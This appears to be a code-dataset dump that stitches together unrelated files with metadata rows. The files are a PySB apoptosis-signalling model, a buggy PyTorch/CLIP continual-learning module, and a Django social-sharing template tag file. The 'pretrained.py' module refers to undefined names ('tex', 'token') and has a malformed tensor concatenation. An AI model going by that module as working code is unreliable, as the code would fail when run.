Monomer('C8A', ['BidU', 'C3pro'])
Monomer('SmacM', ['BaxA'])
Monomer('BaxM', ['BidM', 'BaxA'])
Monomer('Apop', ['C3pro', 'Xiap'])
Monomer('Fadd', ['Receptor', 'C8pro'])
Monomer('SmacC', ['Xiap'])
Monomer('ParpC')
Monomer('Xiap', ['SmacC', 'Apop', 'C3A'])
Monomer('C9')
Monomer('C3ub')
Monomer('C8pro', ['Fadd', 'C6A'])
Monomer('C6A', ['C8pro'])
Monomer('C3pro', ['Apop', 'C8A'])
Monomer('CytoCM', ['BaxA'])
Monomer('CytoCC')
Monomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'SmacM', 'CytoCM'])
Monomer('ApafI')
Monomer('BidU', ['C8A'])
Monomer('BidT')
Monomer('C3A', ['Xiap', 'ParpU', 'C6pro'])
Monomer('ApafA')
Monomer('BidM', ['BaxM'])
Monomer('Receptor', ['Ligand', 'Fadd'])
Monomer('C6pro', ['C3A'])
Parameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)
Parameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)
Parameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)
Parameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)
Parameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf', 1.0)
Parameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)
Parameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)
Parameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)
Parameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)
Parameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)
Parameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)
Parameter('pore_formation_0_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_0_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_1_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_1_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_2_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_2_BaxA_pore_1kr', 1.0)
Parameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf', 1.0)
Parameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr', 1.0)
Parameter('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)
Parameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)
Parameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)
Parameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)
Parameter('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)
Parameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf', 1.0)
Parameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr', 1.0)
Parameter('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc', 1.0)
Parameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf', 1.0)
Parameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr', 1.0)
Parameter('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)
Parameter('Ligand_0', 1000.0)
Parameter('ParpU_0', 1000000.0)
Parameter('C8A_0', 0.0)
Parameter('SmacM_0', 100000.0)
Parameter('BaxM_0', 40000.0)
Parameter('Apop_0', 0.0)
Parameter('Fadd_0', 130000.0)
Parameter('SmacC_0', 0.0)
Parameter('ParpC_0', 0.0)
Parameter('Xiap_0', 75250.0)
Parameter('C9_0', 100000.0)
Parameter('C3ub_0', 0.0)
Parameter('C8pro_0', 130000.0)
Parameter('C6A_0', 0.0)
Parameter('C3pro_0', 21000.0)
Parameter('CytoCM_0', 500000.0)
Parameter('CytoCC_0', 0.0)
Parameter('BaxA_0', 0.0)
Parameter('ApafI_0', 100000.0)
Parameter('BidU_0', 171000.0)
Parameter('BidT_0', 0.0)
Parameter('C3A_0', 0.0)
Parameter('ApafA_0', 0.0)
Parameter('BidM_0', 0.0)
Parameter('Receptor_0', 100.0)
Parameter('C6pro_0', 100.0)
Observable('Ligand_obs', Ligand())
Observable('ParpU_obs', ParpU())
Observable('C8A_obs', C8A())
Observable('SmacM_obs', SmacM())
Observable('BaxM_obs', BaxM())
Observable('Apop_obs', Apop())
Observable('Fadd_obs', Fadd())
Observable('SmacC_obs', SmacC())
Observable('ParpC_obs', ParpC())
Observable('Xiap_obs', Xiap())
Observable('C9_obs', C9())
Observable('C3ub_obs', C3ub())
Observable('C8pro_obs', C8pro())
Observable('C6A_obs', C6A())
Observable('C3pro_obs', C3pro())
Observable('CytoCM_obs', CytoCM())
Observable('CytoCC_obs', CytoCC())
Observable('BaxA_obs', BaxA())
Observable('ApafI_obs', ApafI())
Observable('BidU_obs', BidU())
Observable('BidT_obs', BidT())
Observable('C3A_obs', C3A())
Observable('ApafA_obs', ApafA())
Observable('BidM_obs', BidM())
Observable('Receptor_obs', Receptor())
Observable('C6pro_obs', C6pro())
Rule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)
Rule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)
Rule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None, C6A=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)
Rule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None, C3pro=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)
Rule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None, C3pro=None) + BidU(C8A=None) | C8A(BidU=1, C3pro=None) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)
Rule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1, C3pro=None) % BidU(C8A=1) >> C8A(BidU=None, C3pro=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)
Rule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)
Rule('inhibition_0_SmacC_inhibitor_Xiap_inh_target', SmacC(Xiap=None) + Xiap(SmacC=None, Apop=None, C3A=None) | SmacC(Xiap=1) % Xiap(SmacC=1, Apop=None, C3A=None), inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf, inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr)
Rule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)
Rule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None, C8A=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)
Rule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)
Rule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(SmacC=None, Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(SmacC=None, Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)
Rule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None, C6pro=None) | Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)
Rule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None) >> Xiap(SmacC=None, Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)
Rule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None, C6pro=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)
Rule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)
Rule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)
Rule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)
Rule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)
Rule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)
Rule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)
Rule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)
Rule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)
Rule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)
Rule('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5), transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf, transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr)
Rule('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacC(Xiap=None), transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc)
Rule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)
Rule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)
Rule('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=None) + C3pro(Apop=None, C8A=None) | C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1), catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr)
Rule('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1) >> C8A(BidU=None, C3pro=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc)
Rule('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=None) + C6pro(C3A=None) | C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1), catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf, catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr)
Rule('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + C6A(C8pro=None), catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc)
Rule('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=None) + C8pro(Fadd=None, C6A=None) | C6A(C8pro=1) % C8pro(Fadd=None, C6A=1), catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf, catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr)
Rule('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=1) % C8pro(Fadd=None, C6A=1) >> C6A(C8pro=None) + C8A(BidU=None, C3pro=None), catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc)
Initial(Ligand(Receptor=None), Ligand_0)
Initial(ParpU(C3A=None), ParpU_0)
Initial(C8A(BidU=None, C3pro=None), C8A_0)
Initial(SmacM(BaxA=None), SmacM_0)
Initial(BaxM(BidM=None, BaxA=None), BaxM_0)
Initial(Apop(C3pro=None, Xiap=None), Apop_0)
Initial(Fadd(Receptor=None, C8pro=None), Fadd_0)
Initial(SmacC(Xiap=None), SmacC_0)
Initial(ParpC(), ParpC_0)
Initial(Xiap(SmacC=None, Apop=None, C3A=None), Xiap_0)
Initial(C9(), C9_0)
Initial(C3ub(), C3ub_0)
Initial(C8pro(Fadd=None, C6A=None), C8pro_0)
Initial(C6A(C8pro=None), C6A_0)
Initial(C3pro(Apop=None, C8A=None), C3pro_0)
Initial(CytoCM(BaxA=None), CytoCM_0)
Initial(CytoCC(), CytoCC_0)
Initial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), BaxA_0)
Initial(ApafI(), ApafI_0)
Initial(BidU(C8A=None), BidU_0)
Initial(BidT(), BidT_0)
Initial(C3A(Xiap=None, ParpU=None, C6pro=None), C3A_0)
Initial(ApafA(), ApafA_0)
Initial(BidM(BaxM=None), BidM_0)
Initial(Receptor(Ligand=None, Fadd=None), Receptor_0)
Initial(C6pro(C3A=None), C6pro_0)
| 91.349515
| 710
| 0.806515
|
845186054481ceeb5aae3fd8684349ac61f5aa77
| 4,490
|
py
|
Python
|
NeoCL/models/pretrained.py
|
NizarIslah/NeocorticalCL
|
a0f5cbf863329af9ae752b87f15958105d2c354f
|
[
"Apache-2.0"
] | null | null | null |
NeoCL/models/pretrained.py
|
NizarIslah/NeocorticalCL
|
a0f5cbf863329af9ae752b87f15958105d2c354f
|
[
"Apache-2.0"
] | null | null | null |
NeoCL/models/pretrained.py
|
NizarIslah/NeocorticalCL
|
a0f5cbf863329af9ae752b87f15958105d2c354f
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch import nn
from avalanche.models import IncrementalClassifier
from avalanche.training import ICaRL
from torch.nn import Linear, ReLU, MultiheadAttention, Sequential
import clip
from torchvision import datasets
from collections import defaultdict, deque
import itertools
class SSLIcarl(nn.Module):
def __init__(self, pretrained_net, embedding_size, num_classes):
super(SSLIcarl, self).__init__()
self.feature_extractor = pretrained_net
# self.feature_extractor.freeze()
self.classifier = Linear(embedding_size, num_classes)
def forward(self, x):
x = self.feature_extractor(x) # Already flattened
x = self.classifier(x)
return x
class ImageNetWiki(datasets.CIFAR100):
def __init__(self, root, class_text, transforms=None, text_transforms=None, context_len=77, train=True):
split = 'train' if train else 'val'
super().__init__(root, train)
self.transforms = transforms
self.n_classes = 100
self.class_text = class_text
self.context_len = context_len
self.text_transforms = text_transforms
def __getitem__(self, index):
im, label = super().__getitem__(index)
text = self.class_text[label]['articles'][0][:self.context_len]
text = clip.tokenize(text).squeeze()
if self.text_transforms:
text = self.text_transforms(text)
if self.transforms:
im = self.transforms(im)
text = tex.repeat(text.unsqueeze()[:,None,None])
print(im.shape,text.shape)
im_text=torch.cat([im,text,0])
return im, label
class CLIP_Attention(nn.Module):
def __init__(self, pretrained_net, preprocess, num_classes, num_heads, embed_dim=2048, text_len=77):
super(CLIP_Attention, self).__init__()
self.preprocess = preprocess
self.text_len=text_len
self.feature_extractor = pretrained_net
self.classifier = Sequential(
MultiheadAttention(embed_dim, num_heads),
ReLU(),
Linear(embed_dim, num_classes)
)
def forward(self, x):
image, text = x[:, :-self.text_len], x[:, -self.text_len:]
print(image.shape, text.shape)
image = self.preprocess(image)
with torch.no_grad():
img_features = self.feature_extractor.encode_image(image)
text_features = self.feature_extractor.encode_text(token)
layers = [module for module in self.classifier.modules() if not isinstance(module, nn.Sequential)]
out = layers[0](query=img_features, key=text_features, value=img_features)
for l, module in enumerate(layers[1:]):
out = module(out)
return out
class PretrainedIncrementalClassifier(IncrementalClassifier):
"""
Output layer that incrementally adds units whenever new classes are
encountered.
Typically used in class-incremental benchmarks where the number of
classes grows over time.
"""
def __init__(self, pretrained_model, in_features, initial_out_features=2):
"""
:param in_features: number of input features, should be = to pretrained out size
:param initial_out_features: initial number of classes (can be
dynamically expanded).
"""
super().__init__(in_features)
self.feature_extractor = pretrained_model
self.classifier = Linear(in_features, initial_out_features)
@torch.no_grad()
def adaptation(self, dataset):
""" If `dataset` contains unseen classes the classifier is expanded.
:param dataset: data from the current experience.
:return:
"""
in_features = self.classifier.in_features
old_nclasses = self.classifier.out_features
new_nclasses = max(self.classifier.out_features,
max(dataset.targets) + 1)
if old_nclasses == new_nclasses:
return
old_w, old_b = self.classifier.weight, self.classifier.bias
self.classifier = torch.nn.Linear(in_features, new_nclasses)
self.classifier.weight[:old_nclasses] = old_w
self.classifier.bias[:old_nclasses] = old_b
def forward(self, x, **kwargs):
""" compute the output given the input `x`. This module does not use
the task label.
:param x:
:return:
"""
z = self.encoder(x)
z = self.pre_classifier(z)
return self.classifier(z)
| 37.416667
| 108
| 0.659465
|
1d8f3420130ce81dbc9f1aa684e9bd0ab519acae
| 1,191
|
py
|
Python
|
sharer/templatetags/sharer_tags.py
|
taylanpince/django-sharer
|
91e9bf5aa7b723540f7b248fdf7051a21276eb88
|
[
"Apache-2.0"
] | 2
|
2016-05-09T09:06:06.000Z
|
2018-02-26T22:35:09.000Z
|
sharer/templatetags/sharer_tags.py
|
taylanpince/django-sharer
|
91e9bf5aa7b723540f7b248fdf7051a21276eb88
|
[
"Apache-2.0"
] | null | null | null |
sharer/templatetags/sharer_tags.py
|
taylanpince/django-sharer
|
91e9bf5aa7b723540f7b248fdf7051a21276eb88
|
[
"Apache-2.0"
] | null | null | null |
from urlparse import urljoin
from django import template
from django.contrib.sites.models import Site
from django.template.defaultfilters import urlencode
from sharer.forms import EmailShareForm
from sharer.models import SocialNetwork
from sharer.settings import ENABLE_EMAILS
register = template.Library()
@register.inclusion_tag("sharer/includes/widget.html", takes_context=True)
def share(context, title="", url=""):
"""
Renders the share widget
"""
networks = SocialNetwork.objects.all()
if not url:
url = context.get("SHARE_URI", "")
if url.startswith("/"):
site = Site.objects.get_current()
if site:
url = urljoin("http://%s" % site.domain, url)
return {
"networks": networks,
"title": title,
"url": url,
"ENABLE_EMAILS": ENABLE_EMAILS,
"MEDIA_URL": context.get("MEDIA_URL", ""),
"LANGUAGE_CODE": context.get("LANGUAGE_CODE", ""),
}
@register.simple_tag
def share_url(network, title="", url=""):
"""
Builds a network url with given variables
"""
return network.url % {
"url": urlencode(url),
"title": urlencode(title),
}
| 23.82
| 74
| 0.641478
|
586dc23d21369820a578645e0cb5204786dadb0c
| 1,750
|
py
|
Python
|
nuremberg/core/management/commands/audit_joins.py
|
emmalemma/nuremberg
|
10a5f789f5668aa4e7902e1765737c2c764ff2b2
|
[
"MIT"
] | 3
|
2016-06-27T17:31:24.000Z
|
2021-08-10T17:56:49.000Z
|
nuremberg/core/management/commands/audit_joins.py
|
emmalemma/nuremberg
|
10a5f789f5668aa4e7902e1765737c2c764ff2b2
|
[
"MIT"
] | 43
|
2016-06-19T14:54:20.000Z
|
2021-01-22T19:57:38.000Z
